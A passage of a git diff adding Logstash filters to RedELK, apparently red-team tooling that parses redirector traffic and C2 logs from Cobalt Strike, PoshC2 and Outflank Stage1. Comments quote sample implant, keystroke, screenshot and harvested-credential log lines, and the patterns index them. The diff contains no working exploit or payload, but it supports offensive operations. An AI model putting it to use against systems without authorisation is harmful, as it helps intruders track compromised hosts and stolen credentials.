request:%{GREEDYDATA:[http][request][body][content]}" ] } + add_tag => [ "redirtrafficxforwardedfor" ] + } + } else { + # catchall situation, i.e. cutoff lines when the log lne is larger than the redir's logbuffer size + grok { + match => { "messagenosyslog" => [ "frontend:(?<[redir][frontend][name]>([^/]*))/%{IPORHOST:[redir][frontend][ip]}:%{POSINT:[redir][frontend][port]} backend:%{NOTSPACE:[redir][backend][name]} %{GREEDYDATA:[redir][catchall]}" ] } + add_tag => [ "redirlongmessagecatchall" ] + } + } + + if [messagenosyslog] { + mutate { + remove_field => [ "messagenosyslog" ] + } + } + + # map header values onto dedicated fields and split the values of the headersall field into an array + if [redirtraffic.headersall] { + # map to dedicated fields + grok { + match => { "[http][headers][all]" => [ "(?<[http][headers][useragent]>([^|]*))\|(?<[http][headers][host]>([^|]*))\|(?<[http][headers][x_forwarded_for]>([^|]*))\|(?<[http][headers][x_forwarded_proto]>([^|]*))\|(?<[http][headers][x_host]>([^|]*))\|(?<[http][headers][forwarded]>([^|]*))\|(?<[http][headers][via]>([^|]*))" ] } + } + + # split the values into an array + mutate { + split => { "[http][headers][all]" => "|" } + } + + # Add useragent data + if [http][headers][useragent] { + useragent { + source => "[http][headers][useragent]" + target => "[source][host_info]" + } + } + } + + # Set the timestamp from the log to @timestamp, example: 15/Apr/2018:19:22:31 +0000 + date { + match => [ "[redir][timestamp]", "dd/MMM/yyyy:HH:mm:ss Z" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + # When IPv6 is enabled on your host, IPV4 addresses can be reported like ::ffff:ipv4address. Here we cut off the ::ffff: part + if "ffff" in [source][ip] { + mutate { + gsub => [ + "[source][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [redir][frontend][ip] { + mutate { + gsub => [ + "[redir][frontend][ip]", "\:\:ffff\:", "" + ] + } + } + if "ffff" in [source][cdn][ip] { + mutate { + gsub => [ + "[source][cdn][ip]", "\:\:ffff\:", "" + ] + } + } + + # Add data to the redirraffic.sourceip + if [source][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][domain]" => "%{[source][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][domain]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[source][ip]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[source][as][organization][name]" + "[tmpgeoip][asn]" => "[source][as][number]" + "[tmpgeoip][city_name]" => "[source][geo][city_name]" + "[tmpgeoip][country_code2]" => "[source][geo][country_iso_code]" + "[tmpgeoip][location]" => "[source][geo][location]" + "[tmpgeoip][region_code]" => "[source][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[source][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + + # Add data to the redirtraffic.sourceipcdn + if [source][cdn][ip] { + # duplicate field so we can replace it with reverse DNS lookup + mutate { + add_field => { "[source][cdn][domain]" => "%{[source][cdn][ip]}" } + } + # do reverse DNS lookup + dns { + reverse => ["[source][cdn][domain]"] + action => "replace" + timeout => "2.0" + } + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/30-filter-email_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/30-filter-email_logstash.conf new file mode 100644 index 00000000..1fcd1f55 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/30-filter-email_logstash.conf @@ -0,0 +1,18 @@ +# Part of RedELK +# +# In this file we configure the logstash filters for email inputs +# +# Author: Outflank B.V. / Marc Smeets +# + +filter { + if [infralogtype] == "email" { + + # Set the timestamp from the log to @timestamp + # example: Wed, 29 Jul 2020 10:54:29 +0200 + date { + match => [ "date", "EEE, dd MMM yyyy HH:mm:ss Z" ] + target => "@timestamp" + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf new file mode 100644 index 00000000..64221ac1 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/50-filter-c2-outflankstage1_logstash.conf @@ -0,0 +1,178 @@ +# Part of RedELK +# +# In this file we configure the logstash filtes for Stage 1 teamserver logs +# +# Author: Outflank B.V. / Marc Smeets +# + + +filter { + if [infra][log][type] == "rtops" and [c2][program] == "stage1" { + + # since ECS host.name is filled automatically. In case of C2 server logs it should contain the same value as agent.name. Here we check and drop host.name + if [agent][name] == [host][name] { + mutate { + remove_field => [ "[host][name]" ] + } + } + + # Rules for 'events' from main.log + if [c2][log][type] == "events" { + # Get the timestamp from the log line, and get the rest of the log line + grok { + match => { "message" => "(?<[c2][timestamp]>%{YEAR}\-%{MONTHNUM}\-%{MONTHDAY} %{HOUR}\:%{MINUTE}\:%{SECOND}) UTC \*\*\* (?<[c2][message]>(.|\r|\n)*)" } + } + # Set the timestamp from the log to @timestamp + date { + match => [ "[c2][timestamp]", "YYYY-MM-dd HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + # matching remaing lines of 'events' + mutate { + replace => { "[c2][log][type]" => "events_newimplant" } + } + + # new implant - Starts with INIT or CLIENT_NEW_UID + # matching lines like: INIT stage1Uid:I9TADD99; targetHostname:DESKTOP-MGEG30S; targetUsername:CONTOSO\ieuser; targetOs:Windows 10.0 (OS Build 17763); targetPid:456; targetProcname:Stage1-Syscall_x64_Release.exe; targetArch:64; stage1Killdate:2020-06-06 12:59:40; targetIp:10.10.201.31; transportIp:192.168.96.6; + grok { + match => { "[c2][message]" => "(INIT|CLIENT_NEW_UID) stage1Uid\:(?<[implant][id]>([^;]*)); targetHostname\:(?<[host][name]>([^;]*)); targetUsername\:(?<[user][name]>([^;]*)); targetOs:%{NOTSPACE:[host][os][name]}(?:(%{SPACE}%{NOTSPACE:[host][os][version]} \(OS Build %{NOTSPACE:[host][os][kernel]}\)))?; targetPid:(?<[process][pid]>([^\;]*)); targetProcname:(?<[process][name]>([^\;]*)); targetArch:(?<[implant][arch]>([^\;]*)); stage1Killdate:(?<[implant][kill_date]>([^\;]*)); targetIp:%{IPORHOST:[host][ip_int]}; transportIp:%{IPORHOST:[host][ip_ext]};"} + } + } + + # Rules for 'implant' logs + if [c2][log][type] == "implant" { + # Get the timestamp from the log line, and get the rest of the log line + grok { + match => { "message" => "(?<[c2][timestamp]>%{YEAR}\-%{MONTHNUM}\-%{MONTHDAY} %{HOUR}\:%{MINUTE}\:%{SECOND}) UTC \*\*\* (?<[c2][message]>(.|\r|\n)*)" } + } + # Set the timestamp from the log to @timestamp + date { + match => [ "[c2][timestamp]", "YYYY-MM-dd HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + # matching lines with 'INIT' = new implants + if "INIT " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_newimplant" } + } + + # new implant - Starts with INIT or CLIENT_NEW_UID + # matching lines like: INIT stage1Uid:I9TADD99; targetHostname:DESKTOP-MGEG30S; targetUsername:CONTOSO\ieuser; targetOs:Windows 10.0 (OS Build 17763); targetPid:456; targetProcname:Stage1-Syscall_x64_Release.exe; targetArch:64; stage1Killdate:2020-06-06 12:59:40; targetIp:10.10.201.31; transportIp:192.168.96.6; + grok { + match => { "[c2][message]" => "(INIT|CLIENT_NEW_UID) stage1Uid\:(?<[implant][id]>([^;]*)); targetHostname\:(?<[host][name]>([^;]*)); targetUsername\:(?<[user][name]>([^;]*)); targetOs:%{NOTSPACE:[host][os][name]}(?:(%{SPACE}%{NOTSPACE:[host][os][version]} \(OS Build %{NOTSPACE:[host][os][kernel]}\)))?; targetPid:(?<[process][pid]>([^\;]*)); targetProcname:(?<[process][name]>([^\;]*)); targetArch:(?<[implant][arch]>([^\;]*)); stage1Killdate:(?<[implant][kill_date]>([^\;]*)); targetIp:%{IPORHOST:[host][ip_int]}; transportIp:%{IPORHOST:[host][ip_ext]};"} + } + + # Now duplicate fields host.ip_int and host.ip_ext to host.ip to adhere to ECS. + if [host][ip_int] { + mutate { + add_field => { "[host][ip]" => "%{[host][ip_int]}" } + } + } + if [host][ip_ext] { + mutate { + add_field => { + "[host][domain_ext]" => "%{[host][ip_ext]}" + "[host][ip]" => "%{[host][ip_ext]}" + } + } + # do reverse DNS lookup + dns { + reverse => ["[host][domain_ext]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[host][ip_ext]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[host][ip_ext]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" + "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" + "[tmpgeoip][city_name]" => "[host][geo][city_name]" + "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" + "[tmpgeoip][location]" => "[host][geo][location]" + "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[host][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + + # now duplicate this specific log line, remove some irrelevant fields and make it ready to store in the ImplantsDB index (different output) + clone { + clones => [ "implantsdb" ] + remove_field => [ "[c2][log][type]","[c2][message]","[infra][log][type]" ] + } + } + + # matching lines with 'TASKDISTRIBUTED' = new implants + if "TASKDISTRIBUTED " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_task" } + } + + # matching lines like: TASKDISTRIBUTED stage1Uid:ZPO0VW0W; taskUid:LDCG4JL38W; taskRequest:getpersistkey; taskRequestparameters:OneDrive; + grok { + match => { "[c2][message]" => "TASKDISTRIBUTED stage1Uid\:(?<[implant][id]>([^;]*)); taskUid\:(?<[implant][task_id]>([^;]*)); taskRequest\:(?<[implant][task]>([^;]*)); taskRequestparameters\:(?<[implant][task_parameters]>([^;]*));"} + } + } + + # matching lines with 'TASKRESPONSE' = new implants + if "TASKRESPONSE " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_output" } + } + + # matching lines like: TASKRESPONSE stage1Uid:LA1JSTG3; taskUid:ITXHK99Z19; taskRequest:pwd; taskRequestparameters:; taskResponse:C:\Users\ieuser\Desktop; + grok { + match => { "[c2][message]" => "TASKRESPONSE stage1Uid\:(?<[implant][id]>([^;]*)); taskUid\:(?<[implant][task_id]>([^;]*)); taskRequest\:(?<[implant][task]>([^;]*)); taskRequestparameters\:(?<[implant][task_parameters]>([^;]*)); taskResponse\:(?<[implant][output]>(.|\r|\n)*);"} + } + + # Check if if there was a file downloaded + if "taskResponse: Downloaded " in [c2][message] { + clone { + clones => ["downloads"] + } + + if "downloads" in [type] { + # clean up the fields - remove type and c2logtype, and add c2logtype as downloads + mutate { + remove_field => ["type", "[c2][log][type]"] + } + mutate { + add_field => { "[c2][log][type]" => "downloads" } + } + + # Matching lines like: Downloaded C:\Users\ieuser.CONTOSO\Desktop\Stage1-Syscall_x64_Release.exe 305 kb [1592230528_125IJU9I] Stage1-Syscall_x64_Release.exe; + grok { + match => { "implant_output" => " Downloaded (?<[file][path]>(.|\r|\n)*) %{INT} (kb|mb|b|gb) \[(?<[file][directory_local]>([^\]]*))] (?<[file][name]>([^\;]*));" } + } + + # Add path/URI value to the full implant.log file + ruby { + path => "/usr/share/logstash/redelk-main/scripts/outflankstage1_makedownloadspath.rb" + } + } + } + } + + # Add path/URI value to the full implant.log file + ruby { + path => "/usr/share/logstash/redelk-main/scripts/outflankstage1_makelogpath.rb" + } + + } + } +} \ No newline at end of file diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf new file mode 100644 index 00000000..e0084268 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/51-filter-c2-cobaltstrike_logstash.conf @@ -0,0 +1,393 @@ +# Part of RedELK +# +# In this file we configure the logstash filtes for CobaltStrike teamserver logs +# +# Author: Outflank B.V. / Marc Smeets +# Contributor: Lorenzo Bernardi +# + +filter { + if [infra][log][type] == "rtops" and [c2][program] == "cobaltstrike" { + + # since ECS host.name is filled automatically. In case of C2 server logs it should contain the same value as agent.name. Here we check and drop host.name + if [agent][name] == [host][name] { + mutate { + remove_field => [ "[host][name]" ] + } + } + + # Get the timestamp from the log line, and get the rest of the log line to c2.message + grok { + match => { "message" => "(?<[c2][timestamp]>%{MONTHNUM}\/%{MONTHDAY} %{TIME}) UTC( |\t)%{GREEDYDATA:[c2][message]}" } + } + # Set the timestamp from the log to @timestamp + date { + match => [ "[c2][timestamp]", "MM/dd HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + + # + # Cobalt Strike event log + # Parsed by filebeat as c2.log.type:events + # + if [c2][log][type] == "events" { + # matching lines like: *** initial beacon from username@ip (hostname) + if " initial beacon from " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "events_newimplant" } + } + + grok { + match => { "[c2][message]" => "((/*** initial beacon from)) (?<[user][name]>([^@]*))\@%{IPORHOST:[host][ip_int]} \((?<[host][name]>([^)]*))" } + } + } + + # matching lines like: *** user joined + if " joined" in [c2][message] or " quit" in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "events_joinleave" } + } + + grok { + match => { "[c2][message]" => [ + "\*\*\* (?<[c2][operator]>([^\()]*)) \(%{IP:[c2][operator_ip]}\) joined", + "\*\*\* %{GREEDYDATA:[c2][operator]} quit" + ]} + } + } + } + + + # + # Cobalt Strike beacon log + # Parsed by filebeat as c2.log.type:beacon + # + if [c2][log][type] == "beacon" { + # Add path/URI value to the full beacon.log file + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makebeaconlogpath.rb" + } + + # Set the beacon id from the file name + # Need to match for 3 different occurence: + # - one where it states 'unknown'. + # - where the IP address is known based on the file name with beacon_* + # - where the IP address is known based on the file name with ssh_* + + # It is expected that the logs are in the default subdirectory of the folder cobaltstrike: /cobaltstrike/logs/ + grok { + match => { "[log][file][path]" => [ + "/cobaltstrike/logs/((\d{6}))/unknown/(beacon|ssh)_(?<[implant][id]>(\d{1,10}))", + "/cobaltstrike/logs/((\d{6}))/%{IPORHOST:[host][ip_int]}/(beacon|ssh)_(?<[implant][id]>(\d{1,10}))" + ] } + } + + # matching lines like: [metadata] 1.2.3.4 <- 10.10.10.10; computer: SomeComputername; user: SomeUsername; pid: 7368; os: Windows; version: 6.1; beacon arch: x86 + # todo: this could go wrong if targetip is not an ip but a smb/TCP beacon (can list the beacon session id instead of ip address..? In such case also set the beacon_link value to true + if "[metadata] " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_newimplant" } + } + # need to match 3 types of lines: + # - regular HTTP(S) beacon where the ext IP field is an IP + # - SMB/TCP beacons where the ext IP field is a field like "beacon_12345" + # - SSH beacons + grok { + match => { "[c2][message]" => [ + "[metadata](([^\s]*)) %{IPORHOST:[host][ip_ext]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; process:)) (?<[process][name]>([^\;]*))((\; pid:)) (?<[process][pid]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))((\; version:)) (?<[host][os][version]>([^\;]*))(((\; build:)) (?<[host][os][kernel]>([^\;]*)))?((\; beacon arch:)) (?<[implant][arch]>([^\;]*))", + "[metadata](([^\s]*)) beacon_%{NUMBER:[implant][parent_id]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; process:)) (?<[process][name]>([^\;]*))((\; pid:)) (?<[process][pid]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))((\; version:)) (?<[host][os][version]>([^\;]*))(((\; build:)) (?<[host][os][kernel]>([^\;]*)))?((\; beacon arch:)) (?<[implant][arch]>([^\;]*))", + "[metadata](([^\s]*)) beacon_%{NUMBER:[implant][parent_id]} (([^\s]*)) %{IPORHOST}((\; computer:)) (?<[host][name]>([^\;]*))((\; user:)) (?<[user][name]>([^\;]*))((\; os:)) (?<[host][os][name]>([^\;]*))" + ]} + } + + # Now duplicate fileds host.ip_ext and host.ip_int to host.ip to adhere to ECS. + if [host][ip_int] { + mutate { + add_field => { "[host][ip]" => "%{[host][ip_int]}" } + } + } + if [host][ip_ext] { + mutate { + add_field => { + "[host][domain_ext]" => "%{[host][ip_ext]}" + "[host][ip]" => "%{[host][ip_ext]}" + } + } + # do reverse DNS lookup + dns { + reverse => ["[host][domain_ext]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[host][ip_ext]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[host][ip_ext]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" + "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" + "[tmpgeoip][city_name]" => "[host][geo][city_name]" + "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" + "[tmpgeoip][location]" => "[host][geo][location]" + "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[host][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + + # now duplicate this specific log line, remove some irrelevant fields and make it ready to store in the implantsdb index (different output) + clone { + clones => [ "implantsdb" ] + remove_field => [ "[c2][log][type]","[c2][message]","[infra][log][type]" ] + } + # Now set beacon link information if its a linked beacon. + if [implant][parent_id] { + mutate { + add_field => { "[implant][linked]" => "true" } + add_field => { "[implant][link_mode]" => "child" } + } + } + + } + + # matching lines like: [task] Tasked beacon to sleep for 3600s (20% jitter) + if "[task] " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_task" } + } + + grok { + match => { "[c2][message]" => "(([^\s]*)) %{GREEDYDATA:[implant][task]}" } + } + + # The task log line can contain MITRE ATT&CK numbers of the task that is about to be performed. + # Example: [task] Tasked beacon to take screenshot + # Here we check if '' are in c2.message. If so, we parse the field. + # We also check if there are multiple values, and if so split them up + if "" in [implant][task] { + grok { + match => { "[implant][task]" => "<(?<[threat][technique][id]>([^\>]*))> " } + } + mutate { + split => { "[threat][technique][id]" => ", " } + } + } + } + + # matching lines like: [checkin] host called home, sent: 16 bytes + if "[checkin] " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_checkin" } + } + + grok { + match => { "[c2][message]" => "(([^\s]*)) %{GREEDYDATA:[implant][checkin]}" } + } + } + + # matching lines like: [input] note s3600 20 + if "[input] " in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_input" } + } + + grok { + match => { "[c2][message]" => "(([^\s]*)) (<%{GREEDYDATA:[implant][operator]}>)? %{GREEDYDATA:[implant][input]}" } + } + } + + # matching lines like: [indicator] SomethingSomething + if "[indicator]" in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "ioc" } + } + + # need to match 2 types of lines: one for file and one for service indicators + grok { + match => { "[c2][message]" => [ + "((^\[indicator\])) (?<[ioc][type]>([^\:]*))((:)) %{NOTSPACE:[file][hash][md5]} %{POSINT:[file][size]} ((bytes)) %{GREEDYDATA:[file][name]}", + "((^\[indicator\])) (?<[ioc][type]>([^\:]*))((:)) %{WINPATH:[file][path]} %{NOTSPACE:[file][name]}" + ]} + } + } + + # matching lines like: [output]\nSomethingSomething + if "[output]" in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_output" } + } + + grok { + match => { "[c2][message]" => "]\n%{GREEDYDATA:[implant][output]}" } + } + + # check for messages like: established link to parent beacon: 1.2.3.4 + # todo: add check for recursive smb/TCP beacons (child becomes another beacon's parent). For now this parent-child indication is wrong when a child becomes a parent of another linked beacon + # Done: using parent_id or child_id depending on the relation (beacon can have a parent and a child). Note that a parent beacon can have multiple child beacons, which only the latest will be registered. + if "established link to parent beacon" in [implant][output] { + grok { + match => { "[implant][output]" => "((established link to parent beacon: ))%{IPORHOST:[implant][parent_id]}" } + add_field => { "[implant][linked]" => "true" } + # add_field => { "[implant][link_mode]" => "child" } + } + } + if "established link to child beacon" in [implant][output] { + grok { + match => { "[implant][output]" => "((established link to child beacon: ))%{IPORHOST:[implant][child_id]}" } + add_field => { "[implant][linked]" => "true" } + # add_field => { "[implant][link_mode]" => "child" } + } + } + + # Leaving this in here for legacy as screenshot logging changed in CS4.2. + # check for received screenshots and add a path value to the screenshot + if "received screenshot (" in [implant][output] { + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makescreenshotpath_beforecs4.2.rb" + } + } + } + + # matching lines like: [error]\nSomethingSomething + if "[error]" in [c2][message] { + mutate { + replace => { "[c2][log][type]" => "implant_error" } + } + + grok { + match => { "[c2][message]" => "]%{GREEDYDATA:[implant][output]}" } + } + } + } + + + # + # Cobalt Strike screenshots log + # Parsed by filebeat as c2.log.type:screenshots + # + # This is for CS4.2 and later parsing of screenshot data. Since CS4.2 there is a dedicated screenshots.log file. Before CS4.2 it was parsed from regular beacon log + if [c2][log][type] == "screenshots" { + # Matching lines like: 11/06 21:07:30 UTC MARCS-TEST 1 marcs screen_30efde80_1518442534.jpg + grok { + match => { "[c2][message]" => "(?<[host][name]>([^\s]*))\s(?<[screenshot][desktop_session]>([^\t]*))\t(?<[user][name]>([^\t]*))\t(?<[screenshot][file_name]>([^\t]*))\t(%{GREEDYDATA:[screenshot][title]})" } + } + grok { + match => { "[screenshot][file_name]" => "screen_([^_]*)_(?<[implant][id]>(\d{1,10}))"} + } + + # add url to screenshot files (full and thumb) + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makescreenshotpath.rb" + } + } + + + # + # Cobalt Strike keystrokes log + # Parsed by filebeat as c2.log.type:keystrokes + # + if [c2][log][type] == "keystrokes" { + # Set the beacon id from the file name + # Need to match for 2 different occurence, one where the IP address is known based on the file name, and one where it states 'unknown'. + # It is expected that the logs are in the default subdirectory of the folder cobaltstrike: /cobaltstrike/logs/ + grok { + match => { "[log][file][path]" => [ + "/cobaltstrike/logs/((\d{6}))/unknown/keystrokes/keystrokes_(?<[implant][id]>(\d{0,10}))", + "/cobaltstrike/logs/((\d{6}))/%{IPORHOST:[host][ip_int]}/keystrokes/keystrokes_(?<[implant][id]>(\d{1,10}))" + ]} + } + + # In CS 4.2 the log line inside the keystroke file changed. We now have two possible matches: + # 1. 11/13 10:15:32 UTC Received keystrokes from marc in desktop 2 + # 2. 10/02 11:17:31 UTC Received keystrokes - pre CS 4.2 + if " from " in [c2][message] and " in desktop " in [c2][message] { + grok { + match => { "[c2][message]" => "Received keystrokes from %{GREEDYDATA:[keystrokes][user]} in desktop %{INT:[keystrokes][desktop_session]}" } + } + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makekeystrokespath.rb" + } + } else { + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makekeystrokespath_beforecs4.2.rb" + } + } + } + + + # + # Cobalt Strike downloads log + # Parsed by filebeat as c2.log.type:downloads + # + if [c2][log][type] == "downloads" { + # matching lines like: 05/25 13:29:44 UTC 192.168.217.131 93439 70 /root/cobaltstrike/downloads/2914cdfa8 helloworld.ps1 C:\users\marcs\Desktop\ + grok { + match => { "[c2][message]" => "%{IP:[host][ip_int]}(\t)(?<[implant][id]>(\d{0,10}))(\t)%{INT}(\t)%{NOTSPACE:[file][directory_local]}(\t)(?<[file][name]>([^\t]*))(\t)%{GREEDYDATA:[file][directory]}" } + } + + # add url to full downloads file + ruby { + path => "/usr/share/logstash/redelk-main/scripts/cs_makedownloadspath.rb" + } + } + + + + # + # Cobalt Strike credentials log + # Parsed by filebeat as c2.log.type:credentials + # + if [c2][log][type] == "credentials" { + # Drop the first line with headers + if "#User" in [message] { + drop { } + } + + #Parse the lines with credentials + grok { + match => { "message" => "(?<[creds][realm]>([^\\]*))\\(?<[creds][username]>([^\t]*))\t(?<[creds][credential]>([^\t]*))\t(?<[creds][host]>([^\t]*))\t(?<[creds][source]>([^\t]*))" } + } + } + + + # + # Generic tidy up things below + # + # Add data about OS for nice display + if [host][os][kernel] and [c2][log][type] != "credentials" { + mutate { + add_field => { + "[host][os][family]" => "%{[host][os][name]}" + "[host][os][platform]" => "%{[host][os][name]}" + "[host][os][full]" => "%{[host][os][family]} %{[host][os][version]} (build %{[host][os][kernel]})" + } + } + } + + # Add metadata for SIEM + mutate { + add_field => { + "[event][kind]" => "event" + "[event][category]" => "host" + "[event][module]" => "redelk" + "[event][dataset]" => "c2" + "[event][action]" => "%{[c2][log][type]}" + } + copy => { + "[c2][log][type]" => "[event][type]" + } + } + + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf new file mode 100644 index 00000000..d9a4f538 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/52-filter-c2-poshc2_logstash.conf @@ -0,0 +1,122 @@ +# Part of RedELK +# +# In this file we configure the logstash filters for PoshC2 logs +# +# Author: Outflank B.V. / Marc Smeets / @benpturner - Ben Turner +# Contributor: Lorenzo Bernardi +# + +filter { + if [infra][log][type] == "rtops" and [c2][program] == "poshc2" { + + if [c2][log][type] == "events" { + + # Let's first trim the syslog-like info from the log line + grok { + match => { "message" => [ ".*" ] } + } + + # matching lines like: *** initial implant + if "PID:" in [message] and "Sleep:" in [message] { + + mutate { + replace => { "[c2][log][type]" => "implant_newimplant" } + } + + grok { + match => { "message" => "%{IPORHOST:[host][ext_ip]}\:%{IPORHOST:[host][port]}\s+\|\s+Time:%{GREEDYDATA:[c2][timestamp]}\s+\|\s+PID:%{IPORHOST:[process][pid]}\s+\|\s+Sleep:%{GREEDYDATA:[implant][sleep]}\s+\|\s+%{GREEDYDATA:[user][name]}\s+@\s+%{GREEDYDATA:[host][name]}\s+\(%{GREEDYDATA:[implant][arch]}\)\s+\|\s+URL\:%{GREEDYDATA:[implant][url]}" } + } + + if [host][ext_ip] { + # duplicate field so we can replace it with reverse DNS lookup and add the external IP to [host][ip] + mutate { + add_field => { "[host][ext_domain]" => "%{[host][ext_ip]}" } + copy => { "[host][ext_ip]" => "[host][ip]" } + } + # do reverse DNS lookup + dns { + reverse => ["[host][ext_domain]"] + action => "replace" + timeout => "2.0" + } + # add geo ip info from City DB + geoip { + source => "[host][ext_ip]" + target => "tmpgeoip" + } + # add geo ip info from ASN DB + geoip { + source => "[host][ext_ip]" + target => "tmpgeoip" + default_database_type => "ASN" + } + mutate { + copy => { + "[tmpgeoip][as_org]" => "[host][geo][as][organization][name]" + "[tmpgeoip][asn]" => "[host][geo][as][organization][number]" + "[tmpgeoip][city_name]" => "[host][geo][city_name]" + "[tmpgeoip][country_code2]" => "[host][geo][country_iso_code]" + "[tmpgeoip][location]" => "[host][geo][location]" + "[tmpgeoip][region_code]" => "[host][geo][region_iso_code]" + "[tmpgeoip][region_name]" => "[host][geo][region_name]" + } + remove_field => [ "tmpgeoip" ] + } + } + + date { + match => [ "[c2][timestamp]", "dd/MM/YYYY HH:mm:ss" ] + target => "@timestamp" + timezone => "Etc/UTC" + } + + clone { + clones => [ "implantsdb" ] + remove_field => [ "[c2][log][type]","message","[infra][log_type]" ] + } + + } + + # matching lines like: *** Screenshot captured: + if "Screenshot captured:" in [message] { + + mutate { + replace => { "[c2][log][type]" => "screenshots" } + } + + grok { + # Screenshot.full expects and URL, if the full screenshot is saved then the index needs to be updated to accomodate it + match => { "message" => "Screenshot\s+captured:\s+%{GREEDYDATA:[screenshot][full]}" } + } + + } + + # matching lines like: *** Download: + if "Download file" in [message] { + + mutate { + replace => { "[c2][log][type]" => "downloads" } + } + + grok { + match => { "message" => "Download\s+file\s+part\s+%{GREEDYDATA:[file][path]}" } + } + + } + + # matching lines like: *** Messages: + if "Message from" in [message] or "logged off" in [message] or "logged on" in [message] { + + mutate { + replace => { "[c2][log][type]" => "messages" } + } + + grok { + match => { "message" => "(0[1-9]|[12]\d|3[01])/(0[1-9]|1[0-2])/[12]\d{3}\s+([0-1][0-9]|[2][0-3]):([0-5][0-9]):([0-5][0-9]):%{GREEDYDATA:[c2][message]}" } + } + + } + + } + } +} diff --git a/elkserver/mounts/logstash-config/redelk-main/conf.d/70-filter-pstools_logstash.conf b/elkserver/mounts/logstash-config/redelk-main/conf.d/70-filter-pstools_logstash.conf new file mode 100644 index 00000000..7c0b0675 --- /dev/null +++ b/elkserver/mounts/logstash-config/redelk-main/conf.d/70-filter-pstools_logstash.conf @@ -0,0 +1,63 @@ +# Part of RedELK +# +# In this file we parse the output of the PS-Tools suite by Outflank / @Cn33liz +# This may or may not work with the latest public version ! +# +# More info on PS-Tools at https://outflank.nl/blog/2020/03/11/red-team-tactics-advanced-process-monitoring-techniques-in-offensive-operations/ +# and downloads at https://github.com/outflanknl/Ps-Tools +# +# Author: Outflank B.V. / Marc Smeets +# + +filter { + if [infra][log][type] == "rtops" and "PStoolsStart" in [c2][message] { + grok { + match => { "[c2][message]" => "\[PStoolsStart\]\n\n(?<[pstools][full_output]>(.|\r|\n)*)" } + } + + # Determine the type of PSTool + if "Output from Outflank PSX" in [pstools][full_output] { + grok { + match => { "[pstools][full_output]" => "\[V\] Output from Outflank %{GREEDYDATA:[pstools][tool]}\)\n\n(?<[pstools][psx][processes]>(.|\r|\n)*)\n\n((-)+)\n(?<[pstools][psx][security_products]>(.|\r|\n)*)\n\n((-)+)\n(?<[pstools][psx][summary]>(.|\r|\n)*)\[PStoolsEnd\]" } + } + + if [pstools][psx][security_products] { + grok { + match => { 